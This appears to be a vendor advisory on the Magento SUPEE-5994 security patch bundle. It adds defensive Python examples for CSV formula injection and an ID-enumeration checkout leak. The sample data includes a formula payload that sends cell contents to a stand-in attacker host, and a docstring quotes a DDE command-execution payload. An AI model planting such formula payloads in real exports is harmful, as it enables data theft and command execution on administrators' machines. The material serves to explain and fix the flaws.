Magento Security Patches
Magento Security Patch SUPEE-5994
The Magento Security Patch SUPEE-5994 eight-patch bundle was released on May 14, 2015 to apply solutions to several security issues. The current editions of Magento Commerce and Open Source include this patch. Older versions of Magento products require this update. Learn more about the issues addressed and where to get this update below.
Benefits of Magento Security Patch SUPEE-5994 Bundle
Security Patch SUPEE-5994 bundle solves several security risks, including:
- Cross-site Scripting: Magento Downloader (APPSEC-979)
- Code Injection in Spreadsheet Formulas (APPSEC-978)
- Cross-site Scripting: Authorize.net (APPSEC-907)
- Admin Path Disclosure (APPSEC-977)
- Information Leak: Checkout (APPSEC-945)
- Information Leak: Recurring Profile (APPSEC-926)
- Local Path Disclosure (APPSEC-965)
- Overwritten System Files (APPSEC-535)
The Magento Security Patch SUPEE-5994 bundle addresses issues across several vulnerability classes: cross-site scripting, code injection, information leaks, and path disclosures.
All vendors should use industry best practices in security. Keeping sites up-to-date with upgrades and new patches provides the best protection available.
To acquire the Magento Security Patch SUPEE-5994 bundle:
Go to the portal and select Technical Resources, followed by Download located on the Commerce panel. Next, select Magento Commerce Edition > Patches and Support and open the folder named “Security Patches – May 2015.”
- Magento Commerce Edition Vendors
For Magento Commerce Edition users, access your account page, click on Downloads, and select Magento Commerce Edition > Support patches. Next, look for the “Security Patches – May 2015” folder to download the latest patch. As more recent versions of Commerce Edition include this patch, Forix also recommends upgrading.
- Magento Open Source Edition Vendors
You can find security patches for all previous versions of Magento Open Source Edition on the download page (search for SUPEE-5994). Alternatively, if you choose to upgrade to a current Open Source Edition, you will get this update automatically.
The following is a list of solutions included in the Magento Security Patch SUPEE-5994 bundle.
- Cross-site Scripting: Magento Downloader (APPSEC-979) – Risk Rating: 8.2 High
- Code Injection in Spreadsheet Formulas (APPSEC-978) – Risk Rating: 6.1 Medium
This issue is a spreadsheet (CSV) formula injection: data an attacker controls, such as a customer or order field, is written into an export without sanitization. When an administrator opens the export in Microsoft Excel, a cell that begins with a formula character is evaluated, and the formula can alter data, exfiltrate personal data, or execute commands on the administrator's machine. Excel shows a warning first, but a user who dismisses it activates the formula.
- Cross-site Scripting: Authorize.net (APPSEC-907) – Risk Rating: 6.1 Medium
- Information Leak: Checkout (APPSEC-945) – Risk Rating: 5.3 Medium
This issue exposes other customers' names, addresses, and phone numbers. Because the relevant records are assigned sequential IDs, an attacker who registers an account, adds a product to the cart, and proceeds to checkout can request records that belong to other customers instead of their own.
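The following is an added example (not code from the original page, from Magento, or from Forix) of the spreadsheet formula injection described under APPSEC-978 above. It models a customer export: the unsafe mode writes untrusted fields verbatim, the safe mode neutralizes any cell a spreadsheet would treat as a formula. The customer records, the `neutralize` helper, and the `export_customers` function are all assumptions constructed for illustration and do not correspond to Magento's actual export code.

```python
import csv
import io

# Characters that cause Excel/LibreOffice to evaluate a cell as a formula.
# Tab and carriage return are included because some spreadsheet applications
# strip leading whitespace before checking for a formula prefix.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def is_formula(cell: str) -> bool:
    """True if a spreadsheet application could interpret this cell as a formula."""
    return cell.startswith(FORMULA_PREFIXES)


def neutralize(cell: str) -> str:
    """Defuse a formula cell: prefix a single quote (rendered as text by spreadsheets)
    and escape pipe characters used by DDE payloads such as =cmd|' /C calc'!A0."""
    if not is_formula(cell):
        return cell
    return "'" + cell.replace("|", "\\|")


def export_customers(rows, safe: bool = True) -> str:
    """Serialize customer records to CSV.

    safe=False reproduces the vulnerable behaviour (untrusted fields written verbatim);
    safe=True neutralizes every cell before it is written."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["id", "firstname", "lastname", "email"])
    for row in rows:
        writer.writerow([neutralize(str(v)) if safe else str(v) for v in row])
    return buf.getvalue()


# Constructed sample data (hypothetical): records 2 and 3 carry attacker-supplied
# names that a spreadsheet would evaluate as formulas.
CUSTOMERS = [
    (1, "Alice", "Ahmed", "alice@example.com"),
    (2, '=HYPERLINK("http://attacker.example/?"&A1,"click")', "Smith", "eve@example.com"),
    (3, "-1+1", "O'Neil", "bob@example.com"),
]


def exported_cells_are_safe(rows) -> bool:
    """Re-parse the safe export and confirm no data cell still starts with a formula prefix."""
    parsed = list(csv.reader(io.StringIO(export_customers(rows, safe=True))))
    return not any(is_formula(cell) for record in parsed[1:] for cell in record)


if __name__ == "__main__":
    print("--- vulnerable export ---")
    print(export_customers(CUSTOMERS, safe=False))
    print("--- hardened export ---")
    print(export_customers(CUSTOMERS, safe=True))
```

The single-quote prefix is the conventional mitigation because spreadsheet applications keep the leading quote invisible while treating the cell as text; escaping `|` additionally breaks the DDE command syntax even if a downstream tool strips the quote. The check in `exported_cells_are_safe` is the kind of regression test worth keeping next to any CSV export that includes customer-controlled fields.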
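As an added illustration of the checkout information leak described under APPSEC-945 (this is example code, not Magento's code and not the actual vulnerable path, whose details the page does not give), the block below models a customer address table with sequential IDs. The vulnerable loader trusts the client-supplied ID; the hardened loader verifies that the record belongs to the logged-in customer. The `Address` record, the in-memory `ADDRESSES` table, and the loader functions are assumptions constructed for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Address:
    address_id: int      # sequential primary key, so neighbouring IDs are easy to guess
    customer_id: int     # owner of the record
    name: str
    phone: str
    street: str


# Constructed sample table (hypothetical): three customers, one address each.
# The attacker owns customer 12 / address 3 and can guess that 1 and 2 exist.
ADDRESSES = {
    1: Address(1, 10, "Alice Ahmed", "555-0101", "1 Main St"),
    2: Address(2, 11, "Bob Baker", "555-0102", "2 Oak Ave"),
    3: Address(3, 12, "Eve Example", "555-0103", "3 Elm Rd"),
}


class AccessDenied(Exception):
    pass


def load_address_vulnerable(address_id: int) -> Address:
    """Vulnerable pattern: returns whatever record the client asked for, no ownership check."""
    return ADDRESSES[address_id]


def load_address_hardened(session_customer_id: int, address_id: int) -> Address:
    """Hardened pattern: look the record up, then verify it belongs to the session's customer.

    Missing and foreign records raise the same error so the response does not reveal
    which IDs exist (an existence oracle is itself an information leak)."""
    addr = ADDRESSES.get(address_id)
    if addr is None or addr.customer_id != session_customer_id:
        raise AccessDenied(f"address {address_id} is not accessible")
    return addr


def enumerate_addresses(loader, start: int, stop: int) -> list:
    """Simulates the attack: walk a range of sequential IDs and keep every record returned."""
    found = []
    for address_id in range(start, stop + 1):
        try:
            found.append(loader(address_id))
        except (KeyError, AccessDenied):
            continue
    return found


if __name__ == "__main__":
    attacker_customer_id = 12
    print("vulnerable:", [a.name for a in enumerate_addresses(load_address_vulnerable, 1, 5)])
    print("hardened:  ", [a.name for a in enumerate_addresses(
        lambda i: load_address_hardened(attacker_customer_id, i), 1, 5)])
```

The point of the hardened loader is that the ownership check happens on the server against the authenticated session, not against anything the client sends; the uniform error for missing and foreign IDs keeps the endpoint from confirming which records exist.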
Install the Magento Security Patch SUPEE-5994 Bundle Today
Forix urges vendors to upgrade to a more recent version or to install the Magento Security Patch SUPEE-5994 bundle today to protect storefronts from attack. Forix offers customer support with installing this patch to guarantee a smooth, trouble-free transition.